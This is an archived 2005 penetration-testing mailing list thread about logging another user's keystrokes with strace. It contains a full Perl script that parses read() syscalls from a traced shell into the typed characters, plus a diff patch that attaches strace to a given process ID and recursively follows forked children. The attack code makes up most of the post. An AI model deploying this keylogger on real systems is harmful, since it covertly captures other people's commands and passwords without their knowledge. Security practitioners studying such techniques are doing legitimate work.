Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Keystroke logging with strace (no setup required)

From: Can't dig that daddy <cdtdaddy () hotmail it>
Date: Mon, 18 Jul 2005 12:28:28 +0000
A little patch I'm using to "follow" forking processes...

Have a nice day,
        Can't dig that daddy.

---------snip-----------------
20c20
< open (F, "tail -f $ARGV[0] |");
---

open (F, "strace -p $ARGV[0] 2>&1 |");

22c22
<         next if !/^read/;
---

        next if !/^read/ && !/^clone/;

37a38,40

        } elsif (/^clone\(.+,\s.+,\s.+\)\s=\s(\d+)/) {
                system("/usr/bin/perl -w $0 $1");

---------snip-----------------


Alle 16:59, martedì 12 luglio 2005, Lachniet, Mark ha scritto:

Apparently Tom's original message never made it to the list, but I think
this is well worth the bandwidth to share.  Tom wrote a quick Perl
script to parse the output from strace, so you could use the method I
described a little (lot) more conveniently.  I haven't tested it but it
looks pretty straight forward.  Sorry bout the line breaks but I didn't
want to send an attachment.

Mark Lachniet

---------snip-----------------
#!/usr/bin/perl -w
#
#  Monitoring a user's shellcommands by using strace and displaying and
cleaning up the read() syscalls
#  Based on the tip posted to secfocus by Mark Lachniet, written by Tom
Van de Wiele.
#
#  To be used on a logfile or in real-time (as fast as /usr/bin/script
logs to file that is) like this:
#
#     # script /tmp/what_is_user_foo_doing.log
#     Script started, file is /tmp/what_is_user_foo_doing.log
#     # strace -p <PID of shell of user>
#
#     Using a different terminal at the same time:
#     # perl strace_clean.pl /tmp/what_is_user_doing.log
#
#
use strict;  # hi Kris :)

my $char;

open (F, "tail -f $ARGV[0] |");
while (<F>) {
      next if !/^read/;
      next if /^$/;
      if (/^read\(0,\s\"(.*)\".*/) {
              $char = $1;
              if ($char =~ /\\r/) {
                      print "\n";
              }
              elsif ($char =~ /\\177/) {
                      print "\b";
              }
              elsif ($char =~ /\\t/) {
                      print "<TAB>";
              }
              else {
                      print $char;
              }
      }
}

# EOF
Previous By Date Next
Previous By Thread Next

Current thread: